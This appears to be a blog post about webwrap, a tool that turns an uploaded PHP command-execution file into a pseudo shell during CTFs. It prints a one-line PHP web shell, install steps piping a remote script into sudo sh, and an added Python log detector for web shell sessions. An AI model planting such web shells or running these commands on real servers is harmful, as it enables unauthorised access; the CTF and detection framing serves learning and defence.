webwrap - An amazing pseudo web shell tool
Introduction
A few days ago, while doing a CTF, I encountered a problem. I was able to upload a PHP file to the target server, but I couldn't spawn a web shell due to firewall restrictions. The only way I could interact with the server was by executing commands through the uploaded PHP file and printing the output on the page.
The simplified PHP file (the original one utilized a disabled_functions bypass, because exec() was disabled in the config):
<?php
// run the command passed in the "cmd" query parameter and print its last output line
echo exec($_GET['cmd']);
?>
Until that CTF I was using a Python script to automate it: in a while loop, get user input, send a request and print the response to the terminal. It works, but it's very inefficient, mainly because it doesn't keep the current working directory between commands. Fortunately, I found a tool that does exactly what I need!
webwrap
webwrap is a tool that automates the process described above and creates a pseudo shell that simulates a real one. Github: https://github.com/mxrch/webwrap
Installation
Linux (Quick)
curl -s https://raw.githubusercontent.com/mxrch/webwrap/master/install.sh | sudo sh
Linux (normal)
sudo apt install rlwrap
git clone https://github.com/mxrch/webwrap;
cd webwrap;
sudo python3 -m pip install -r requirements.txt
Windows
git clone https://github.com/mxrch/webwrap;
cd webwrap;
python -m pip install -r requirements.txt
Usage
webwrap http://<LINK>/my_verycool_webshell.php?cmd=WRAP
Where:
my_verycool_webshell.php is your shell file
cmd is the argument that the shell uses ($_GET['<here>'])
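From the defender's side, a webwrap session is a burst of plain GET requests from one client to one PHP file, each carrying a shell command in the cmd parameter, which stands out in web server access logs. The script below is an added example (not part of the original post or of webwrap) that flags such sessions in constructed sample log lines; the suspect parameter names, the shell-keyword regex and the request threshold are assumptions to tune for your environment.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Apache/nginx "combined" access-log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Parameter names one-line PHP shells commonly read (the post's file uses "cmd");
# this set is an assumption, extend it for your environment.
SUSPECT_PARAMS = {"cmd", "command", "exec", "c"}
# Shell builtins and metacharacters that rarely appear in legitimate query values.
SHELL_HINT_RE = re.compile(r"(\bcd\b|\bls\b|\bcat\b|\bwhoami\b|\bid\b|\|\||&&|;|\$\()")

# Constructed sample log lines (not from the original post): one webwrap-style
# session from 10.0.0.5, plus ordinary traffic that must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /uploads/my_verycool_webshell.php?cmd=whoami HTTP/1.1" 200 12',
    '10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /uploads/my_verycool_webshell.php?cmd=cd%20%2Ftmp%3B%20ls HTTP/1.1" 200 88',
    '10.0.0.5 - - [10/Oct/2023:13:55:44 +0000] "GET /uploads/my_verycool_webshell.php?cmd=id HTTP/1.1" 200 40',
    '192.168.1.20 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120',
    '192.168.1.21 - - [10/Oct/2023:13:56:05 +0000] "GET /search.php?cmd=hello HTTP/1.1" 200 300',
]

def parse_line(line):
    """Return (ip, path, params) for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parsed = urlparse(m.group("url"))
    return m.group("ip"), parsed.path, parse_qs(parsed.query)  # parse_qs URL-decodes values

def find_webshell_sessions(lines, min_requests=3):
    """Return {(ip, path): [values]} for PHP paths that repeatedly receive shell-like
    values in a suspect parameter from the same client; min_requests is a tuning knob."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, params = rec
        if not path.endswith(".php"):
            continue
        for name in SUSPECT_PARAMS.intersection(params):
            for value in params[name]:
                if SHELL_HINT_RE.search(value):
                    hits[(ip, path)].append(value)
    return {key: values for key, values in hits.items() if len(values) >= min_requests}
```

Run it over a real access log by replacing SAMPLE_LOG with the file's lines; a single match is weak evidence, so the threshold is what separates a webwrap-style session from a one-off odd query.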
Limitations
While using this tool you need to remember that it is not a real shell. Commands such as su or ssh will not work, as they require a full interactive terminal, but some of them can be bypassed with e.g. Python's pty. Additionally, commands that take more than ~2 seconds to execute will time out the request and break the script.
Conclusions
webwrap is an amazing tool to use when you cannot get a regular reverse shell. It automates the process of sending command-execution requests and makes you much faster. Although it has its limitations, I'll definitely use it in future CTFs.